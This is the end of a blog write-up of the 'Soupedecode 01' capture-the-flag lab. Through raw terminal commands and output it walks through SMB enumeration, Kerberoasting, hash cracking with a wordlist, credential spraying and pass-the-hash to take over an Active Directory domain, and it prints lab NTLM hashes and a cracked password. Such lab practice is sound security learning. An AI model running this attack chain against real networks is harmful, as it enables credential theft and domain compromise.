445 DC01 [+] SOUPEDECODE.LOCAL\svc_backup:svc_backup (Guest) root@ip-10-10-171-65:~# smbclient //10.10.63.125/Users -U 'soupedecode.local\ybob317' Password for [SOUPEDECODE.LOCAL\ybob317]: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Thu Jul 4 23:48:22 2024 .. DHS 0 Wed Jun 18 23:14:47 2025 admin D 0 Thu Jul 4 23:49:01 2024 Administrator D 0 Thu Aug 7 13:52:45 2025 All Users DHSrn 0 Sat May 8 09:26:16 2021 Default DHR 0 Sun Jun 16 03:51:08 2024 Default User DHSrn 0 Sat May 8 09:26:16 2021 desktop.ini AHS 174 Sat May 8 09:14:03 2021 Public DR 0 Sat Jun 15 18:54:32 2024 ybob317 D 0 Mon Jun 17 18:24:32 2024
smb: \> cd ybob317 smb: \ybob317\> ls . D 0 Mon Jun 17 18:24:32 2024 .. DR 0 Thu Jul 4 23:48:22 2024 3D Objects DR 0 Mon Jun 17 18:24:32 2024 AppData DH 0 Mon Jun 17 18:24:30 2024 Application Data DHSrn 0 Mon Jun 17 18:24:30 2024 Contacts DR 0 Mon Jun 17 18:24:32 2024 Cookies DHSrn 0 Mon Jun 17 18:24:30 2024 Desktop DR 0 Fri Jul 25 18:51:44 2025 Documents DR 0 Mon Jun 17 18:24:32 2024 Downloads DR 0 Mon Jun 17 18:24:32 2024 Favorites DR 0 Mon Jun 17 18:24:32 2024 Links DR 0 Mon Jun 17 18:24:32 2024 Local Settings DHSrn 0 Mon Jun 17 18:24:30 2024 Music DR 0 Mon Jun 17 18:24:32 2024 My Documents DHSrn 0 Mon Jun 17 18:24:30 2024 NetHood DHSrn 0 Mon Jun 17 18:24:30 2024 NTUSER.DAT AHn 262144 Thu Aug 7 14:13:12 2025 ntuser.dat.LOG1 AHS 81920 Mon Jun 17 18:24:29 2024 ntuser.dat.LOG2 AHS 0 Mon Jun 17 18:24:29 2024 NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TM.blf AHS 65536 Mon Jun 17 18:24:54 2024 NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jun 17 18:24:29 2024 NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jun 17 18:24:29 2024 ntuser.ini AHS 20 Mon Jun 17 18:24:30 2024 Pictures DR 0 Mon Jun 17 18:24:32 2024 Recent DHSrn 0 Mon Jun 17 18:24:30 2024 Saved Games DR 0 Mon Jun 17 18:24:32 2024 Searches DR 0 Mon Jun 17 18:24:32 2024 SendTo DHSrn 0 Mon Jun 17 18:24:30 2024 Start Menu DHSrn 0 Mon Jun 17 18:24:30 2024 Templates DHSrn 0 Mon Jun 17 18:24:30 2024 Videos DR 0 Mon Jun 17 18:24:32 2024
smb: \ybob317\> cd Desktop smb: \ybob317\Desktop\> ls . DR 0 Fri Jul 25 18:51:44 2025 .. D 0 Mon Jun 17 18:24:32 2024 desktop.ini AHS 282 Mon Jun 17 18:24:32 2024 user.txt A 33 Fri Jul 25 18:51:44 2025
smb: \ybob317\Desktop\> cat user.txt cat: command not found smb: \ybob317\Desktop\> get user.txt getting file \ybob317\Desktop\user.txt of size 33 as user.txt (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec) smb: \ybob317\Desktop\> quit root@ip-10-10-171-65:~# smbclient //10.10.63.125/Users -U 'soupedecode.local\ybob317' Password for [SOUPEDECODE.LOCAL\ybob317]: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Thu Jul 4 23:48:22 2024 .. DHS 0 Wed Jun 18 23:14:47 2025 admin D 0 Thu Jul 4 23:49:01 2024 Administrator D 0 Thu Aug 7 13:52:45 2025 All Users DHSrn 0 Sat May 8 09:26:16 2021 Default DHR 0 Sun Jun 16 03:51:08 2024 Default User DHSrn 0 Sat May 8 09:26:16 2021 desktop.ini AHS 174 Sat May 8 09:14:03 2021 Public DR 0 Sat Jun 15 18:54:32 2024 ybob317 D 0 Mon Jun 17 18:24:32 2024
smb: \> cd ybob317
nano /etc/hosts
10.10.63.125 soupedecode.local DC01 soupedecode
apt install sntp
sudo sntp -sS soupedecode.local
sntp 4.2.8p12@1.3728-o (1)
2025-08-07 15:04:56.887926 (+0000) -0.809341 +/- 10.596628 soupedecode.local 10.10.63.125 s1 no-leap
GetUserSPNs.py soupedecode.local/ybob317:ybob317 -dc-ip 10.10.63.125 -request -outputfile tickets.txt
john --wordlist=/usr/share/wordlists/rockyou.txt tickets.txt
Password123!!
john --show tickets.txt
cat tickets.txt
netexec smb 10.10.63.125 -u file_svc -p 'Password123!!' -d soupedecode.local
smbclient //10.10.63.125/backup -U 'soupedecode.local\file_svc'
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca
netexec smb $(IP) -u 'file_svc' -p '***********' - shares
netexec smb 10.10.176.0 -u 'file_svc' -p 'Password123!!' - shares
nano hashes.txt
cat hashes.txt | cut -d ':' -f 1 > users.txt
cat hashes.txt | cut -d ':' -f 1 > backup_extract_users.txt
cat hashes.txt | cut -d ':' -f 4 > backup_extract_hashes.txt
nxc smb dc01.soupedecode.local -u backup_extract_users.txt -H backup_extract_hashes.txt --no-bruteforce --continue-on-success
netexec smb 10.10.63.125 -u backup_extract_users.txt -H backup_extract_hashes.txt -d soupedecode.local
Finding the flag wasnβt straightforward, but I ended up using this command and looked within the files to get the root flag in the Desktop folder: C:\Users\Administrator\Desktop\root.txt
smbclient [//10.10.72.65/C$](<https://10.10.72.65/C$>) -U 'SOUPEDECODE.LOCAL\\FileServer$' --pw-nt-hash e41da7e79a4c76dbd9cf79d1cb325559
In completing Soupedecode 01, we demonstrated how an attacker can pivot from unauthenticated enumeration to domain dominance by leveraging SMB shares, Kerberos authentication, and weak service accounts. The challenge reinforces a crucial lesson: Active Directory environments are only as strong as their weakest credential or misconfigured service. By practicing these steps in a controlled lab, defenders gain insight into how attackers operate, while red teamers sharpen their tradecraft. Ultimately, this exercise highlights why enforcing strong authentication policies, securing SMB/LDAP services, and monitoring account activity are vital in defending enterprise networks.
0
Subscribe to my newsletter
Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
Jebitok
Jebitok
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.